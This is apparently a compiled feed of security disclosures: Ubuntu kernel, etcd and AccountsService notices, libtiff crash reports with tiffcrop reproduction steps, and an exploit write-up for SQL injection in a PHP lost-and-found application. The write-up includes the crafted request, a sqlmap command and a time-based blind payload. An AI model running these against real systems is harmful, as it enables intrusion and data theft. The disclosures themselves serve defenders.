Ubuntu Security Notice 6192-1 - Hangyu Hua discovered that the Flower classifier implementation in the Linux kernel contained an out-of-bounds write vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code. Xingyuan Mo and Gengjia Chen discovered that the io_uring subsystem in the Linux kernel did not properly handle locking when IOPOLL mode is being used. A local attacker could use this to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6192-1June 29, 2023linux, linux-allwinner, linux-allwinner-5.19, linux-aws, linux-aws-5.19,linux-azure, linux-gcp, linux-gcp-5.19, linux-hwe-5.19, linux-ibm,linux-kvm, linux-lowlatency, linux-oracle, linux-raspi, linux-starfive,linux-starfive-5.19 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.10- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-allwinner: Linux kernel for Allwinner processors- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-kvm: Linux kernel for cloud environments- linux-lowlatency: Linux low latency kernel- linux-oracle: Linux kernel for Oracle Cloud systems- linux-raspi: Linux kernel for Raspberry Pi systems- linux-starfive: Linux kernel for StarFive processors- linux-allwinner-5.19: Linux kernel for Allwinner processors- linux-aws-5.19: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp-5.19: Linux kernel for Google Cloud Platform (GCP) systems- linux-hwe-5.19: Linux hardware enablement (HWE) kernel- linux-starfive-5.19: Linux kernel for StarFive processorsDetails:Hangyu Hua discovered that the Flower classifier implementation in theLinux kernel contained an out-of-bounds write vulnerability. An attackercould use this to cause a denial of service (system crash) or possiblyexecute arbitrary code. (CVE-2023-35788, LP: #2023577)Xingyuan Mo and Gengjia Chen discovered that the io_uring subsystem in theLinux kernel did not properly handle locking when IOPOLL mode is beingused. A local attacker could use this to cause a denial of service (systemcrash). (CVE-2023-2430)It was discovered that for some Intel processors the INVLPG instructionimplementation did not properly flush global TLB entries when PCIDs areenabled. An attacker could use this to expose sensitive information(kernel memory) or possibly cause undesired behaviors. (LP: #2023220)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.10:   linux-image-5.19.0-1015-allwinner  5.19.0-1015.15   linux-image-5.19.0-1020-starfive  5.19.0-1020.22   linux-image-5.19.0-1022-raspi   5.19.0-1022.29   linux-image-5.19.0-1022-raspi-nolpae  5.19.0-1022.29   linux-image-5.19.0-1025-ibm     5.19.0-1025.27   linux-image-5.19.0-1026-kvm     5.19.0-1026.27   linux-image-5.19.0-1026-oracle  5.19.0-1026.29   linux-image-5.19.0-1027-gcp     5.19.0-1027.29   linux-image-5.19.0-1028-aws     5.19.0-1028.29   linux-image-5.19.0-1028-lowlatency  5.19.0-1028.29   linux-image-5.19.0-1028-lowlatency-64k  5.19.0-1028.29   linux-image-5.19.0-1029-azure   5.19.0-1029.32   linux-image-5.19.0-46-generic   5.19.0-46.47   linux-image-5.19.0-46-generic-64k  5.19.0-46.47   linux-image-5.19.0-46-generic-lpae  5.19.0-46.47   linux-image-allwinner           5.19.0.1015.15   linux-image-aws                 5.19.0.1028.25   linux-image-azure               5.19.0.1029.24   linux-image-gcp                 5.19.0.1027.23   linux-image-generic             5.19.0.46.42   linux-image-generic-64k         5.19.0.46.42   linux-image-generic-lpae        5.19.0.46.42   linux-image-ibm                 5.19.0.1025.22   linux-image-kvm                 5.19.0.1026.23   linux-image-lowlatency          5.19.0.1028.24   linux-image-lowlatency-64k      5.19.0.1028.24   linux-image-oracle              5.19.0.1026.22   linux-image-raspi               5.19.0.1022.21   linux-image-raspi-nolpae        5.19.0.1022.21   linux-image-starfive            5.19.0.1020.18   linux-image-virtual             5.19.0.46.42Ubuntu 22.04 LTS:   linux-image-5.19.0-1015-allwinner  5.19.0-1015.15~22.04.1   linux-image-5.19.0-1020-starfive  5.19.0-1020.22~22.04.1   linux-image-5.19.0-1027-gcp     5.19.0-1027.29~22.04.1   linux-image-5.19.0-1028-aws     5.19.0-1028.29~22.04.1   linux-image-5.19.0-46-generic   5.19.0-46.47~22.04.1   linux-image-5.19.0-46-generic-64k  5.19.0-46.47~22.04.1   linux-image-5.19.0-46-generic-lpae  5.19.0-46.47~22.04.1   linux-image-allwinner           5.19.0.1015.15~22.04.8   linux-image-aws                 5.19.0.1028.29~22.04.12   linux-image-gcp                 5.19.0.1027.29~22.04.1   linux-image-generic-64k-hwe-22.04  5.19.0.46.47~22.04.21   linux-image-generic-hwe-22.04   5.19.0.46.47~22.04.21   linux-image-generic-lpae-hwe-22.04  5.19.0.46.47~22.04.21   linux-image-starfive            5.19.0.1020.22~22.04.7   linux-image-virtual-hwe-22.04   5.19.0.46.47~22.04.21After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6192-1   https://launchpad.net/bugs/2023220   https://launchpad.net/bugs/2023577   CVE-2023-2430, CVE-2023-35788Package Information:   https://launchpad.net/ubuntu/+source/linux/5.19.0-46.47   https://launchpad.net/ubuntu/+source/linux-allwinner/5.19.0-1015.15   https://launchpad.net/ubuntu/+source/linux-aws/5.19.0-1028.29   https://launchpad.net/ubuntu/+source/linux-azure/5.19.0-1029.32   https://launchpad.net/ubuntu/+source/linux-gcp/5.19.0-1027.29   https://launchpad.net/ubuntu/+source/linux-ibm/5.19.0-1025.27   https://launchpad.net/ubuntu/+source/linux-kvm/5.19.0-1026.27   https://launchpad.net/ubuntu/+source/linux-lowlatency/5.19.0-1028.29   https://launchpad.net/ubuntu/+source/linux-oracle/5.19.0-1026.29   https://launchpad.net/ubuntu/+source/linux-raspi/5.19.0-1022.29   https://launchpad.net/ubuntu/+source/linux-starfive/5.19.0-1020.22 https://launchpad.net/ubuntu/+source/linux-allwinner-5.19/5.19.0-1015.15~22.04.1   https://launchpad.net/ubuntu/+source/linux-aws-5.19/5.19.0-1028.29~22.04.1   https://launchpad.net/ubuntu/+source/linux-gcp-5.19/5.19.0-1027.29~22.04.1   https://launchpad.net/ubuntu/+source/linux-hwe-5.19/5.19.0-46.47~22.04.1 https://launchpad.net/ubuntu/+source/linux-starfive-5.19/5.19.0-1020.22~22.04.1

Ubuntu Security Notice USN-6192-1

Ubuntu Security Notice 6191-1 - USN-6081-1, USN-6084-1, USN-6092-1 and USN-6095-1 fixed vulnerabilities in the Linux kernel. Unfortunately, that update introduced a spurious warning in the IPv6 subsystem. This update removes the undesired warning message.

    ==========================================================================Ubuntu Security Notice USN-6191-1June 29, 2023linux, linux-aws, linux-aws-hwe, linux-azure, linux-azure-4.15,linux-dell300x, linux-gcp, linux-gcp-4.15, linux-hwe, linux-kvm,linux-oracle, linux-raspi2, linux-snapdragon regression==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTS- Ubuntu 16.04 LTS (Available with Ubuntu Pro)Summary:The system could show undesired warning messages in certain conditions.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-azure-4.15: Linux kernel for Microsoft Azure Cloud systems- linux-dell300x: Linux kernel for Dell 300x platforms- linux-gcp-4.15: Linux kernel for Google Cloud Platform (GCP) systems- linux-kvm: Linux kernel for cloud environments- linux-oracle: Linux kernel for Oracle Cloud systems- linux-raspi2: Linux kernel for Raspberry Pi systems- linux-snapdragon: Linux kernel for Qualcomm Snapdragon processors- linux-aws-hwe: Linux kernel for Amazon Web Services (AWS-HWE) systems- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-hwe: Linux hardware enablement (HWE) kernelDetails:USN-6081-1, USN-6084-1, USN-6092-1 and USN-6095-1 fixed vulnerabilities inthe Linux kernel. Unfortunately, that update introduced a spurious warningin the IPv6 subsystem. This update removes the undesired warning message.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS:   linux-image-4.15.0-1067-dell300x  4.15.0-1067.72   linux-image-4.15.0-1121-oracle  4.15.0-1121.132   linux-image-4.15.0-1134-raspi2  4.15.0-1134.142   linux-image-4.15.0-1142-kvm     4.15.0-1142.147   linux-image-4.15.0-1151-gcp     4.15.0-1151.167   linux-image-4.15.0-1152-snapdragon  4.15.0-1152.162   linux-image-4.15.0-1158-aws     4.15.0-1158.171   linux-image-4.15.0-1167-azure   4.15.0-1167.182   linux-image-4.15.0-213-generic  4.15.0-213.224   linux-image-4.15.0-213-generic-lpae  4.15.0-213.224   linux-image-4.15.0-213-lowlatency  4.15.0-213.224   linux-image-aws-lts-18.04       4.15.0.1158.156   linux-image-azure-lts-18.04     4.15.0.1167.135   linux-image-dell300x            4.15.0.1067.66   linux-image-gcp-lts-18.04       4.15.0.1151.165   linux-image-generic             4.15.0.213.196   linux-image-generic-lpae        4.15.0.213.196   linux-image-kvm                 4.15.0.1142.133   linux-image-lowlatency          4.15.0.213.196   linux-image-oracle-lts-18.04    4.15.0.1121.126   linux-image-raspi2              4.15.0.1134.129   linux-image-snapdragon          4.15.0.1152.151   linux-image-virtual             4.15.0.213.196Ubuntu 16.04 LTS (Available with Ubuntu Pro):   linux-image-4.15.0-1121-oracle  4.15.0-1121.132~16.04.1   linux-image-4.15.0-1152-gcp     4.15.0-1152.168~16.04.1   linux-image-4.15.0-1158-aws     4.15.0-1158.171~16.04.1   linux-image-4.15.0-1167-azure   4.15.0-1167.182~16.04.1   linux-image-4.15.0-213-generic  4.15.0-213.224~16.04.1   linux-image-4.15.0-213-lowlatency  4.15.0-213.224~16.04.1   linux-image-aws-hwe             4.15.0.1158.141   linux-image-azure               4.15.0.1167.151   linux-image-gcp                 4.15.0.1152.142   linux-image-generic-hwe-16.04   4.15.0.213.198   linux-image-gke                 4.15.0.1152.142   linux-image-lowlatency-hwe-16.04  4.15.0.213.198   linux-image-oem                 4.15.0.213.198   linux-image-oracle              4.15.0.1121.102   linux-image-virtual-hwe-16.04   4.15.0.213.198After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://launchpad.net/bugs/2020279   https://ubuntu.com/security/notices/USN-6191-1Package Information:   https://launchpad.net/ubuntu/+source/linux/4.15.0-213.224   https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1158.171   https://launchpad.net/ubuntu/+source/linux-azure-4.15/4.15.0-1167.182   https://launchpad.net/ubuntu/+source/linux-dell300x/4.15.0-1067.72   https://launchpad.net/ubuntu/+source/linux-gcp-4.15/4.15.0-1151.167   https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1142.147   https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1121.132   https://launchpad.net/ubuntu/+source/linux-raspi2/4.15.0-1134.142   https://launchpad.net/ubuntu/+source/linux-snapdragon/4.15.0-1152.162

Ubuntu Security Notice USN-6191-1

libtiff 4.5.0 is vulnerable to Buffer Overflow in uv_encode() when libtiff reads a corrupted little-endian TIFF file and specifies the output to be big-endian.

Skip to content

**Get started with Code Suggestions, available for free during the beta period.**

Code faster and more efficiently with AI-powered code suggestions in VS Code. 13 languages are supported, including JavaScript, Python, Go, Java, and Kotlin. Enable Code Suggestions in your user profile preferences or see the documentation to learn more.

*   libtiff
*   libtiff
*   Issues
*   #530

Open Issue created Feb 15, 2023 by **Tseng Szu Wei@13579and24680**

**SEGV at /libtiff/tif\_luv.c:961 in uv\_encode()**

**Summary**

An SIGSEGV caused when using tiffcrop.

**Version**

    $ ./tools/tiffcrop -v
    Library Release: LIBTIFF, Version 4.5.0
    Copyright (c) 1988-1996 Sam Leffler
    Copyright (c) 1991-1996 Silicon Graphics, Inc.
    Tiffcp code: Copyright (c) 1988-1997 Sam Leffler
               : Copyright (c) 1991-1997 Silicon Graphics, Inc
    Tiffcrop additions: Copyright (c) 2007-2010 Richard Nolde
    
    $ git log --oneline -1
    c861f25c (HEAD -> master, origin/master, origin/HEAD) Merge branch 'tiffcrop_dont_reuse_input_buffer_fix_527' into 'master'

**Steps to reproduce****make**

    git clone https://gitlab.com/libtiff/libtiff.git
    cd libtiff
    ./autogen.sh
    ./configure
    make

**run**

    $ ./tools/tiffcrop -B poc temp
    TIFFReadDirectoryCheckOrder: Warning, Invalid TIFF directory; tags are not sorted in ascending order.
    TIFFReadDirectory: Warning, Unknown field with tag 12336 (0x3030) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 3120 (0xc30) encountered.
    TIFFFetchNormalTag: Defined set_field_type of custom tag 12336 (Tag 12336) is TIFF_SETGET_UNDEFINED and thus tag is not read from file.
    TIFFFetchNormalTag: Defined set_field_type of custom tag 3120 (Tag 3120) is TIFF_SETGET_UNDEFINED and thus tag is not read from file.
    TIFFAdvanceDirectory: Error fetching directory count.
    fish: Job 1, './tools/tiffcrop -B poc temp' terminated by signal SIGSEGV (Address boundary error)

**Platform**

    $ uname -a
    Linux 13579 5.15.0-56-generic #62~20.04.1-Ubuntu SMP Tue Nov 22 21:24:20 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
    
    $ gcc --version
    gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0
    Copyright (C) 2019 Free Software Foundation, Inc.
    This is free software; see the source for copying conditions.  There is NO
    warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

**ASAN report**

    ./tools/tiffcrop -B poc temp
    TIFFReadDirectoryCheckOrder: Warning, Invalid TIFF directory; tags are not sorted in ascending order.
    TIFFReadDirectory: Warning, Unknown field with tag 12336 (0x3030) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 3120 (0xc30) encountered.
    TIFFFetchNormalTag: Defined set_field_type of custom tag 12336 (Tag 12336) is TIFF_SETGET_UNDEFINED and thus tag is not read from file.
    TIFFFetchNormalTag: Defined set_field_type of custom tag 3120 (Tag 3120) is TIFF_SETGET_UNDEFINED and thus tag is not read from file.
    TIFFAdvanceDirectory: Error fetching directory count.
    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==1381705==ERROR: AddressSanitizer: SEGV on unknown address 0x7f1876003420 (pc 0x7f1c75f78cb0 bp 0x7ffc95fdf630 sp 0x7ffc95fdf600 T0)
    ==1381705==The signal is caused by a READ memory access.
        #0 0x7f1c75f78caf in uv_encode /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tif_luv.c:961
        #1 0x7f1c75f797b2 in LogLuv24fromXYZ /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tif_luv.c:1057
        #2 0x7f1c75f79f58 in Luv24fromXYZ /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tif_luv.c:1120
        #3 0x7f1c75f76522 in LogLuvEncode24 /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tif_luv.c:569
        #4 0x7f1c75f775c7 in LogLuvEncodeStrip /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tif_luv.c:722
        #5 0x7f1c75fcb6bb in TIFFWriteEncodedStrip /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tif_write.c:308
        #6 0x563fd6857160 in writeBufferToContigStrips /home/a13579/fuzz_lib_tiff/report/libtiff_asan/tools/tiffcrop.c:1317
        #7 0x563fd688022e in writeCroppedImage /home/a13579/fuzz_lib_tiff/report/libtiff_asan/tools/tiffcrop.c:9197
        #8 0x563fd685f4d5 in main /home/a13579/fuzz_lib_tiff/report/libtiff_asan/tools/tiffcrop.c:2834
        #9 0x7f1c75a96082 in __libc_start_main ../csu/libc-start.c:308
        #10 0x563fd6855b6d in _start (/home/a13579/fuzz_lib_tiff/report/libtiff_asan/tools/.libs/tiffcrop+0x9b6d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tif_luv.c:961 in uv_encode
    ==1381705==ABORTING

**poc**

poc

CVE-2023-26966: SEGV at /libtiff/tif_luv.c:961 in uv_encode() (#530) · Issues · libtiff / libtiff · GitLab

libtiff 4.5.0 is vulnerable to Buffer Overflow via /libtiff/tools/tiffcrop.c:8499. Incorrect updating of buffer size after rotateImage() in tiffcrop cause heap-buffer-overflow and SEGV.

Skip to content

**Get started with Code Suggestions, available for free during the beta period.**

Code faster and more efficiently with AI-powered code suggestions in VS Code. 13 languages are supported, including JavaScript, Python, Go, Java, and Kotlin. Enable Code Suggestions in your user profile preferences or see the documentation to learn more.

*   libtiff
*   libtiff
*   Issues
*   #520

Open Issue created Jan 27, 2023 by **Tseng Szu Wei@13579and24680**

**heap-buffer-overflow in processCropSelections() at /libtiff/tools/tiffcrop.c:8499 (SIGSEGV)**

**Summary**

An SIGSEGV caused when using tiffcrop.

AddressSanitizer reports it as heap-buffer-overflow.

**Version**

    $ ./tools/tiffcrop  -v
    Library Release: LIBTIFF, Version 4.5.0
    Copyright (c) 1988-1996 Sam Leffler
    Copyright (c) 1991-1996 Silicon Graphics, Inc.
    Tiffcp code: Copyright (c) 1988-1997 Sam Leffler
               : Copyright (c) 1991-1997 Silicon Graphics, Inc
    Tiffcrop additions: Copyright (c) 2007-2010 Richard Nolde
    
    $ git log --oneline -1
    a63e18ca (HEAD -> master, origin/master, origin/HEAD) Merge branch 'add_windows_DLL_versioninfo' into 'master'

**Steps to reproduce****make**

    git clone https://gitlab.com/libtiff/libtiff.git
    cd libtiff
    ./autogen.sh
    ./configure
    make

**run**

    ./tools/tiffcrop -Z 12:50,12:99 -R 270 poc /dev/null
    TIFFReadDirectoryCheckOrder: Warning, Invalid TIFF directory; tags are not sorted in ascending order.
    TIFFReadDirectory: Warning, Unknown field with tag 12336 (0x3030) encountered.
    TIFFFetchNormalTag: Defined set_field_type of custom tag 12336 (Tag 12336) is TIFF_SETGET_UNDEFINED and thus tag is not read from file.
    TIFFReadDirectory: Warning, Sum of Photometric type-related color channels and ExtraSamples doesn't match SamplesPerPixel. Defining non-color channels as ExtraSamples..
    TIFFAdvanceDirectory: Error fetching directory count.
    loadImage: Image lacks Photometric interpretation tag.
    Fax4Decode: Uncompressed data (not supported) at line 0 of strip 0 (x 10).
    
    (... too long ignore)
    
    fish: Job 1, './tools/tiffcrop  -Z 12:50,12:9…' terminated by signal SIGSEGV (Address boundary error)

**Platform**

    $ uname -a
    Linux 13579 5.15.0-56-generic #62~20.04.1-Ubuntu SMP Tue Nov 22 21:24:20 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
    
    $ gcc --version
    gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0
    Copyright (C) 2019 Free Software Foundation, Inc.
    This is free software; see the source for copying conditions.  There is NO
    warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

**ASAN report**

    ==3490861==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fb40a368a45 at pc 0x7fb40d6e7f3d bp 0x7ffca5726e70 sp 0x7ffca5726618
    WRITE of size 296067 at 0x7fb40a368a45 thread T0
        #0 0x7fb40d6e7f3c in __interceptor_memset ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:762
        #1 0x7fb40d614fb7 in _TIFFmemset /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/libtiff/tif_unix.c:341
        #2 0x560accbdb18a in processCropSelections /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tools/tiffcrop.c:8499
        #3 0x560accbbe0e9 in main /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tools/tiffcrop.c:2807
        #4 0x7fb40d0d8082 in __libc_start_main ../csu/libc-start.c:308
        #5 0x560accbb4b6d in _start (/home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tools/.libs/tiffcrop+0x9b6d)
    
    0x7fb40a368a45 is located 0 bytes to the right of 148037-byte region [0x7fb40a344800,0x7fb40a368a45)
    allocated by thread T0 here:
        #0 0x7fb40d78d808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
        #1 0x7fb40d614f03 in _TIFFmalloc /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/libtiff/tif_unix.c:326
        #2 0x560accbb4d00 in limitMalloc /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tools/tiffcrop.c:710
        #3 0x560accbe005e in rotateImage /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tools/tiffcrop.c:9605
        #4 0x560accbdb9f3 in processCropSelections /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tools/tiffcrop.c:8566
        #5 0x560accbbe0e9 in main /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tools/tiffcrop.c:2807
        #6 0x7fb40d0d8082 in __libc_start_main ../csu/libc-start.c:308
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:762 in __interceptor_memset
    Shadow bytes around the buggy address:
      0x0ff7014650f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0ff701465100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0ff701465110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0ff701465120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0ff701465130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0ff701465140: 00 00 00 00 00 00 00 00[05]fa fa fa fa fa fa fa
      0x0ff701465150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0ff701465160: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0ff701465170: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0ff701465180: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0ff701465190: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==3490861==ABORTING

**poc**

poc

CVE-2023-25433: heap-buffer-overflow in processCropSelections() at /libtiff/tools/tiffcrop.c:8499 (SIGSEGV) (#520) · Issues · libtiff / libtiff · GitLab

Lost and Found Information System v1.0 was discovered to contain a SQL injection vulnerability via the component /php-lfis/admin/?page=system_info/contact_information.

\# Exploit Title:Lost and Found Information System v1.0 - Sql Injection # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html # Version: V1.0.0 # Tested on:Linux REQUEST POST /php-lfis/classes/SystemSettings.php?f=update\_settings HTTP/1.1 Host: localhost Content-Length: 454 sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="94" Accept: application/json, text/javascript, \*/\*; q=0.01 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2NerUgrr08nxdAqe X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 sec-ch-ua-platform: "Linux" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/php-lfis/admin/?page=system\_info/contact\_information Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: PHPSESSID=fncg346s7j3fr654lsapbb8sqs Connection: close ------WebKitFormBoundary2NerUgrr08nxdAqe Content-Disposition: form-data; name="phone" 1234567890 ------WebKitFormBoundary2NerUgrr08nxdAqe Content-Disposition: form-data; name="mobile" 1234567890 ------WebKitFormBoundary2NerUgrr08nxdAqe Content-Disposition: form-data; name="email" test1@test.com ------WebKitFormBoundary2NerUgrr08nxdAqe Content-Disposition: form-data; name="address" test1 ------WebKitFormBoundary2NerUgrr08nxdAqe-- sqlmap -r lfis.txt --random-agent --batch -tamper=space2comment --dbs \[!\] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program \[\*\] starting @ 22:21:18 /2023-05-11/ \[22:21:18\] \[INFO\] parsing HTTP request from 'lfis.txt' \[22:21:18\] \[INFO\] loading tamper module 'space2comment' \[22:21:18\] \[INFO\] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; Linux x86\_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30' from file '/usr/share/sqlmap/data/txt/user-agents.txt' Multipart-like data found in POST body. Do you want to process it? \[Y/n/q\] Y \[22:21:18\] \[INFO\] resuming back-end DBMS 'mysql' \[22:21:18\] \[INFO\] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: MULTIPART phone ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: ------WebKitFormBoundarydhpsLF47Y6ZvrvP2 Content-Disposition: form-data; name="phone''' AND (SELECT 1875 FROM (SELECT(SLEEP(5)))oGnm) AND 'hBeF'='hBeF ------WebKitFormBoundarydhpsLF47Y6ZvrvP2 Content-Disposition: form-data; name="mobile" 1234567890 ------WebKitFormBoundarydhpsLF47Y6ZvrvP2 Content-Disposition: form-data; name="email" test@test.com ------WebKitFormBoundarydhpsLF47Y6ZvrvP2 Content-Disposition: form-data; name="address" test ------WebKitFormBoundarydhpsLF47Y6ZvrvP2-- --- \[22:21:18\] \[WARNING\] changes made by tampering scripts are not included in shown payload content(s) \[22:21:18\] \[INFO\] the back-end DBMS is MySQL web application technology: PHP 8.1.17, Apache 2.4.56 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) \[22:21:18\] \[INFO\] fetching database names \[22:21:18\] \[INFO\] fetching number of databases \[22:21:18\] \[WARNING\] time-based comparison requires larger statistical model, please wait.............................. (done) \[22:21:18\] \[WARNING\] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions \[22:21:18\] \[WARNING\] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex' \[22:21:18\] \[ERROR\] unable to retrieve the number of databases \[22:21:18\] \[INFO\] falling back to current database \[22:21:18\] \[INFO\] fetching current database \[22:21:18\] \[INFO\] resumed: lfis\_db available databases \[1\]: \[\*\] lfis\_db \[22:21:18\] \[INFO\] fetched data logged to text files under '/root/.local/share/sqlmap/output/localhost' \[22:21:18\] \[WARNING\] your sqlmap version is outdated \[\*\] ending @ 22:21:18 /2023-05-11/

CVE-2023-33592: CVE/CVE-2023-33592 at main · DARSHANAGUPTA10/CVE

Ubuntu Security Notice 6189-1 - It was discovered that etcd leaked credentials when debugging was enabled. This allowed remote attackers to discover etcd authentication credentials and possibly escalate privileges on systems using etcd.

==========================================================================  
Ubuntu Security Notice USN-6189-1  
June 28, 2023

etcd vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10

Summary:

etcd could be made to expose sensitive information over the  
network.

Software Description:  
- etcd: highly-available key value store -- client

Details:

It was discovered that etcd leaked credentials when debugging  
was enabled. This allowed remote attackers to discover etcd   
authentication credentials and possibly escalate privileges on  
systems using etcd.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
etcd-client 3.4.23-4ubuntu0.1  
etcd-server 3.4.23-4ubuntu0.1

Ubuntu 22.10:  
etcd-client 3.3.25+dfsg-7ubuntu0.22.10.2  
etcd-server 3.3.25+dfsg-7ubuntu0.22.10.2

In general, a standard system update will make all the necessary changes.

References:  
https://ubuntu.com/security/notices/USN-6189-1  
CVE-2021-28235

Package Information:  
https://launchpad.net/ubuntu/+source/etcd/3.4.23-4ubuntu0.1  
https://launchpad.net/ubuntu/+source/etcd/3.3.25+dfsg-7ubuntu0.22.10.2

Ubuntu Security Notice USN-6189-1

Ubuntu Security Notice 6190-1 - Kevin Backhouse discovered that AccountsService incorrectly handled certain D-Bus messages. A local attacker could use this issue to cause AccountsService to crash, resulting in a denial of service, or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6190-1  
June 28, 2023

accountsservice vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

AccountsService could be made to crash or run programs if it received  
specially crafted messages.

Software Description:  
- accountsservice: query and manipulate user account information

Details:

Kevin Backhouse discovered that AccountsService incorrectly handled certain  
D-Bus messages. A local attacker could use this issue to cause  
AccountsService to crash, resulting in a denial of service, or possibly  
execute arbitrary code.

